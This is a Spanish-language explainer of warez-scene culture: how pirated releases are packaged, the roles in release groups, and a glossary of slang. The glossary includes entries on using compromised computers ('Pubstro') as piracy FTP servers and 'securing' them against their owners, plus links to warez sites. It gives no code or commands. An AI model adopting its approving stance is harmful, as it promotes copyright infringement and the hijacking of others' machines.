Un lanzamiento es una pieza de material pirateado empaquetada y liberada por un grupo de warez. El formato del lanzamiento varía, pero en el caso de juegos o programas el lanzamiento es usualmente en bin/cue, comprimido con RAR, y partido en archivos de 15,000,000 bites. El nombre del lanzamiento usualmente será algo en la línea de "Nuevo.Juego.3-GrUPOLANZAMIENTO".
El tipo de lanzamientos varía. En los juegos son principalmente imágenes de CD (formato bin/cue) o Ripeos. Las películas vienen codificadas en DivX/Xivds (dos o tres archivos bin/cue). Hay muchos tipos diferentes de lanzamientos de películas. Una gran lista de estas puede ser encontrada en www.vcdquality.com. Los lanzamientos serán casi siempre acompañados por un archivo .nfo. Este provee información sobre el lanzamiento y el grupo.
Información Adicional
La siguiente información no es de primera mano, como lo fue la anterior. Esta fue obtenida de archivos de texto, contada a mí por gente, y asumida. Será mayormente precisa, pero bien pueden haber errores.
Los miembros principales de cada grupo de lanzamientos son:
El Proveedor. Este es el tipo trabajando en el cine local o la tienda de videojuegos, el tipo con la cámara digital feliz de infiltrarse en la sala de cine, etc. Generalmente esta gente tiene que tener acceso a nuevo material, usualmente antes de que nadie lo consiga. Frecuentemente también tienen que tener una una velocidad de subida bastante decente.
El Cracker (solo en grupos de juegos/aplicaciones). Este podrá variar entre grupos. Por ejemplo, un grupo de VCD/SVCD no requeriría un cracker. Pero el cracker juega un rol importante. El tendrá que romper (crackear) la protección del juego que le impide ser ejecutado sin el CD oficial. Este tipo usualmente tiene bastante experiencia en programación y puede ser bastante inteligente.
Proveedor del Sitio. Igual al intercambio de sitios, aunque los grupos de warez son frecuentemente más meticulosos sobre los sitios que eligen. La velocidad mínima es usualmente 100Mbit y frecuentemente los grupos solo aceptaran sitios que sean provistos por el actual SysOp o los Administradores en persona.
Courier (mensajero). El rol de este tipo es básicamente intercambio de sitios. El tiene que distribuir el lanzamiento del grupo en otros sitios.
Terminos que pueden ser difíciles de entender su significado:
PRE/PRE'd. Cuando un lanzamiento es liberado se harán anuncios a lo largo de varios canales IRC llamados "PRE Chans". Esto es llamado el "PRE Time" y es la hora oficial del lanzamiento. El PRE Time se usa principalmente en el intercambio de sitios.
0*. Esto es una referencia a cuan nuevo es el lanzamiento.
0sec. Esto es un sueño - novatos de canales IRC frecuentemente usan este término pero mienten.
0hour. Significa que el lanzamiento fue PRE'd (lanzado) hace una hora.
0day. Significa que el lanzamiento fue lanzado hace un día.
Y así sigue...
Nukeado. Si un lanzamiento es nukeado, el que subió el lanzamiento perderá créditos en el sitio en el que es nukeado. Un lanzamiento es nukeado cuando rompe las reglas del sitio (como 8 horas de PRE o más antiguo).
Pubstro/Stro. Esta es una computadora que fue comprometida y tiene un FTPD corriendo en ella. Será usada para compartir warez, principalmente a la comunidad FXP.
ScanStro. Similar a la de arriba, pero es usada para escanear otras computadoras.
Pub/Pubbing. Estos son de los viejos tiempos cuando cada servidor FTP de una universidad o empresa tenía el acceso a escritura habilitado para las cuentas anónimas. Así en lugar de irrumpir en una computadora, los "warez kiddies" subían allí su warez y pasaban la dirección IP a sus amigos. Esto fue muy popular pero se murió por obvias razones.
Tagging (catalogación). Una vez encontrado un pub es "taggueado" (catalogado, se crea una carpeta con el nombre "tagged.by.lamepubkiddie" o algo similar). La idea es que si un Pub ya fue "taggueado" los otros "Pubbers" lo dejarán como está. Esto parece que funcionó por un tiempo, con gente respetando los tags de otros y dejando los Pubs tranquilos. Pero ciertamente no funcionó por un largo tiempo.
Dir Locking (bloqueo de directorio). Esto era usado en el Pubbing para impedir a gente que no sea de tu grupo de warez de encontrar y bajar tu warez (y congestionar el servidor). Lo esconderías, usando nombres de directorio como "com1" y ".". Estos nombres de directorío también serían difíciles de borrar o de incluso abrir, por lo que llevaría un tiempo antes de que el warez fuese encontrado por el administrador del sistema.
Raping. El acto de "Raping" (violar) un servior ftp es cuando alguien baja todo y cada cosa que puede a muy alta velocidad. Está mal visto.
Leeching. Bajar un montón sin subir.
PubStealing/Rehacking. Volviendo a "aquellos días" esto se referiría a subir cosas a un Pub ya taggueado. Ahora significa reemplazar el Serv-U de alguien con el tuyo. El robo de Pubs está mal visto y la gente que sea encontrada haciéndolo será banneada de los Boletines FXP.
Securing (Asegurar). El acto de asegurar un Pubstro podría involucrar borrar archivos clave como ftp.exe, tftp.exe, cmd.exe, etc. o cambiar usuario/contraseña. Los métodos dependen de la vulnerabilidad que se trate.
Algunos links relacionados al warez:
www.nforce.nl - un sitio que archiva .nfo's y lanzamientos. Este sitio está mal visto por la gente de "la escena".
www.isonews.com - un sitio allanado por el gobierno federal.
www.vcdquality.com - específicamente para películas.
www.fxp.nl - cosas de FXP.
www.jtpfxp.net - generalmente el más grande archivo de tutoriales de fxp/script kiddie.
www.packetnews.org - motor de búsqueda XDCC
www.downhillbattle.org - no relacionado, pero que se joda la RIAA!
Si mencioné un programa y no di un link es porque puede ser fácilmente encontrado por google.
Eso es todo, espero que de a algunos una mejor vista de la piratería.
WIDGETIZE